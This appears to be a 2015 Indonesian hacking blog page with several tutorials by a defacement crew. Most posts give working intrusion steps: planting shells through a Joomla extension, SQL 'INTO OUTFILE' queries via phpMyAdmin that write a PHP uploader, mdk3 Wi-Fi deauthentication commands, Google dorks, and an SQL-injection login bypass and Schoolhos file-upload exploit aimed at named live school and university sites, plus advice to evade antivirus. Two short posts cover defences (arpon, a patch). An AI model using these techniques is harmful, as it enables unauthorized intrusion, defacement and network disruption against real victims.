Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Monday, July 27, 2015

Tutorial Upload Shell Di Joomla Versi 3 Keatas






Author : Aihara Anwaru
Codename : Falcon-G21
Team : Falcon-G21 Team Dark - MC - IndoXploit Coder Team
Tutorial Name : Tutorial Upload Shell Di Joomla Versi 3 Keatas


Selamat malam kawan2 Cyber, malam hari ini saya akan berbagi suatu tutorial
walau dibilang sudah jadul tapi masih berguna ^_^
silahkan di simak ya ^_^

Pertama
Siapakan Plugin yang sudah ada Shellnya
Kalau belum punya silahkan download di Here
Web yang cms joomla tentunya dan memiliki access ke administrator

langkah pertama login ke administrator panel
bila sukses kita lanjut ke langkah selanjutnya
Pertama klik Extensions => Extensions Manager
Liat SS Dibawah ini



Lalu Browser/Cari file plugin/extensions yang sudah kita masukan shellnya
lalu klik upload dan tunggu prosesnya selsai
Liat SS dibawah ini



Bila sudah selesai mengupload plugin/extensions maka akan muncul
seperti gambar di bawah ini :


dan tandanya berhasil

nah selanjutnya kita eksekusi shellkita.
Bagaimana caranya?
kita bukan linknya, contoh :
http://target.com/administrator/components/nama-plugin-atau-extensions-kalian/lokasi-folder-shell-mu/namashell.php
atau
http://target.com/administrator/components/nama-plugin-atau-extensions-kalian/namashell.php

Bila Shellmu sudah berhasil terbuka, silahkan melanjutkan ke langkah selanjutnya ^_^
Good Luck ^_^

#Silent to be Better ^_^

NB: Bila shell tidak bisa terbuka, berarti server side telah memproteck system di web target serta ada anti virusnya ^_^
saran gunakan shellnya tidak terdeteck anvir,

Sekian terima kasih

Monday, July 13, 2015

Tutorial Upload Shell/File melalui phpMyAdmin Di Xampp

Author : Aihara Anwaru
Codename : Falcon-G21
Team : Falcon-G21 Team Dark
Title : Tutorial Upload Shell/File melalui phpMyAdmin Di Xampp

Let's Begin Read My Tutorial ^_^
Pertama cari targetnya, di sini saya localhost dengan link mrlover21.net
oke pertama
kita buka
http://mrlover21.net/phpmyadmin/querywindow.php
dan akan muncul seperti gambar di bawah ini :



Note : jika phpmyadmin di proteksi oleh password makan kita tidak bisa membobolnya

ok, next ke langkah selanjutnya
di sini saya punya 2 bentuk query 1 untuk linux dan 2 untuk windows
karena saya pakai windows maka
kita pakai query ke-2

Query 1 untuk linux :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;


Query 2 untuk windows :

use mysql;
DROP TABLE IF EXISTS `temptab1`;
CREATE TABLE temptab1 (codetab text);
INSERT INTO temptab1 (codetab) values ('<form enctype="multipart/form-data" action="upload99.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form99.php' from temptab1;
DROP TABLE temptab1;
FLUSH LOGS;

lebih lengkap liat screenshot di bawah ini :



dan tekan go, jika berhasil maka akan muncul seperti gambar dibawah ini :



Note : code query yang kita masukan di atas itu berfungsi menjadi form uploadernya
sekarang coba kita panggil formnya
karena nama filenya form99.php
maka kita panggil http://mrlover21.net/form99.php
liat ssnya di bawah :



sekarang kita lanjut ke langkah selanjutnya, yaitu membuat confirm dai form uploader
sama seperti query untuk form uploadernya, di sini terdapat 2 query
kita pakai query untuk windows

Query 1 untuk linux :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

Query 2 untuk windows :

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload99.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS

lebih jelas liat screenshot dibawah ini





jika sudah
sekarang tinggal upload shellnya dengan cara pangill file form99.php
contoh : mrlover21.net/form99.php lalu browse file shellmu atau file defacemu ^_^
lalu tekan upload tara shell/file defacemu sudah ke upload
tinggal buka deh contoh
http://mrlover21.net/www.mrlover21.org.php



sekian! terima kasih ^_^
Jangan lupa berkunjung terus ya ^_^
Falcon-G21 Team Dark


Wednesday, July 1, 2015

Anti-Netcut or mdk3

Author : Aihara Anwaru
Codename : Falcon-G21
Other Codename : Mr.Lover_21
Team : Falcon-G21 Team Dark
OS : Kali Linux 3.14-kali1 - amd64  / Other
Last Tutorial : Disconnet People Connetion using mdk3 on Kali Linux
Tutorial Name : Anti-Netcut or mdk3 ( maybe ) :v :D

This Tutorial using Englis language
Lets Begin and See tutorial ^_^

First
Install arpon 
   
Next
Edit Configuration
   
Check like on my configration :


Next
If you finised edited configuration, for run you have 2 choose :
First shutdown => eth0 ( in this connection we attach arpon at wlan0)
    $sudo ifconfig eth0 down 
Second run arpon
         
   
Thanks for read my tutorial but sorry im not used Screen Shoot but other time i was insert screenshot
Falcon-G21 Team Dark


Monday, June 29, 2015

Cara Memutuskan Koneksi Orang Dengan mdk3 di Kali Linux






 Author : Aihara Anwaru
Codename : Falcon-G21
Other Codename : Mr.Lover_21
Team : Falcon-G21 Team Dark
OS : Kali Linux 3.14-kali1 - amd64
Tutorial Name : Disconneted Other Connection with mdk3

This Tutorial using Englis language
Lets Begin and See tutorial ^_^

First
Open Terminal
Type " airmon-ng "
Press Enter on keyboard
withoun > " <


 next
Type " airmon-ng start wlan0 "
Press Enter
withoun > " <


 next
Type " echo your mac adrees >> whitelist.txt "
Note : if you not know you mac address see used ifconfig

example : my mac address is => 48:d2:24:6f:69:ea
echo 48:d2:24:6f:69:ea >> whitelist.txt
file : whitelist.txt you can change name with other name do you like ^_^
if you finised add you mac address to white list
 

 next
Type mdk3 mon0 d -w whitelist.txt
Press Enter for start and you see other connection is disconnected ^_^





Thanks ^_^
Falcon-G21 Team Dark

Thursday, May 14, 2015

Tutorila Deface Dengan Bypass Admin

                                         "Powered By Eduwebnesia Creativity Team"
Selamat siang sobat. Hari ini saya mau berbagi tutorial tentang deface dengan method bypass admin login - SQL Injection Vuln.
Ok tidak perlu pakai lama gan tetapi saya mau ingatkan.
 Jangan deface index utama dari web,
cukup nitif file dan tutup bugnya ^_^
Ok Langkah Pertama cari web vuln dengan google dork.
DORK : intext:"Powered By Eduwebnesia Creativity Team"
Agan bisa kembangi lagi drok nya :)
Di sini saya pakai live targetnya : http://p3m.umsu.ac.id/
bila sudah mendapatkan targetnya mari kita login linknya http://p3m.umsu.ac.id/login atau http://p3m.umsu.ac.id/[Path]/login
masukan user : '=''or'  dan password : '=''or'
Liat SSnya Gan ^_^


Setelah sukses login, mari kita upload shell, liat ss gan ^_^


 Kalau sudah terupload akan muncul seperti gambar seperti dibawah ini:
 Agan klik judul dari file yang di upload lalu akan di alihkan ke page selanjutnya seperti gambar di bawah ini :
 Setelah itu kita buka shellnya di http://target.com/files/uploaded/random_namashell.php

Sekiann tutorial dari saya. Semoga bermanfaat ya. Jangna lupa share ^_^

Saturday, May 9, 2015

Tutorial Pacth Bug Pada CMS Schoolhos Versi 2.29

Assallamuallaikum dan selama siang kawan ^_^
di siang hari ini aku nak bagi tutorial pacth CMS Schoolhos versi 2.29.
Macem mana nak pacth, jum tengo lebih lanjut tutorial ini :v
Pertama download file auto pacthnya di Click Here
Mirror
lalu extra di hosting agan dan taruh di di luar dekat folder konfigurasi,elearning,adminpanel dll.
agan juga bisa edit dulu isi filenya untuk menentukan lokasi folder tempat filenya yang akan di pacth!
contohnya :
folder default adminpanel/aplikasi/databse
jika yang agan punya sudah agan modift foldernya tapi belum di pacth!
contohnya :
folder yang sudah agan edit adminpane/data/databse dll
cukup ganti pada code $namafile1="adminpanel/aplikasi/database/$cipok1"; menjadi $namafile1="nama dir/folder yang sudah agan edit/$cipok1";
dan seterusnya :v
setelah itu buka dengan link, contoh http://mrlover21.org/auto-pacth-bug-cms-schoolhos.php
lalu tekan tombol pacth now dan nanti akan muncul pemberitahuan bahwa file telah di pacth

ini contoh file yang sebelum dan seduh di pacth serta ss programnya ^_^









sekian terima kasih semoga bermanfaat :)
E-mail saya jika ada yang ingin di tanya di dearfalcon21@gmail.com atau inbox via facebook https://www.facebook.com/messages/tinkere21

Wednesday, April 15, 2015

CMS Schoolhos Remote Arbitrary File Upload

                           CMS Schoolhos Remote Arbitrary File Upload                           
 Assallamuallaikum Sobat SegacrewSoft
Siang Hari ini saya mau berbagi sebuah tutorial deface cms schoolhos ^_^
Tapi Apa itu dulu cms schoolhos?
CMS Schoolhos adalah sebuah sistem manajemen konten yang dapat anda peroleh secara gratis ( opensource ), CMS Schoolhos adalah CMS karya anak bangsa :XD :) (y).
Jadi, pada cms ini asih banyak kekurangannya.
Karya Mas : -Ari Rusmanto-

Ok kita masuk ke tutorialnya,
bug cms schoolhos ada dua type pertama Cdan CMS Schoolhos Remote Arbitrary File! Upload
Disini saya membahas yang upload file vuln saja, karna tidak ribet dan mudah ^_^

Ok, kita mulai :
Pertama cari target dengan google dork :
List Dork saya :
1. inurl:"/adminpanel/login.php" intext:"Schoolhos Opensource CMS Sekolah"
2. inurl:"/adminpanel/" intext:"Schoolhos Opensource CMS Sekolah"
3. intext:"Schoolhos Opensource CMS Sekolah"
4. inurl:/?p=bukutamu
Sisanya Sobat kembangkan sendiri ajah :v

disini saya anggap sobat telah menemukan targetnya!
contoh : http://mrlover21.net/versi_2.29/?p=bukutamu
Lalu sobat bukan Tools Exploiternya
di http://andelayuwono.org
dan copy link target, contoh http://mrlover21.net/versi_2.29 lalu paste ke Tools Exploter yang sudah saya sediakan
atau bisa lihat Seperti Gambar Ini =>



Kemudiak, klik button Lock target, maka akan tampil from tempat upload dan pengisian data2
untuk data2nya biarkan secara default sajah. Kita fokus untuk upload file
Lihat Seperti Gambar Ini =>





Setelah, mencari file shell atau sript defacemu di PC atau Laptopmu maka clik upload
dan otomatis akan ke tampilan login adminnya
Lihat gambar berikut ini =>




Bila sudah di halaman admin tersebut tanda shellmu sudah terupload dan bisa di akses di
http://mrlover21.net/versi_2.29/file/materi/namashellmu.php
Lihat Seperti gamabr berikut ini =>



Lihat Seperti gamabr berikut ini =>



Ok, Sekian Tutor saya, kalau ada kata2 saya yang kurang mohon maaf ya soalnya udh lama tidak ngeblog :v heheheheh :D
Live Target : http://www.reginacaelischool.com/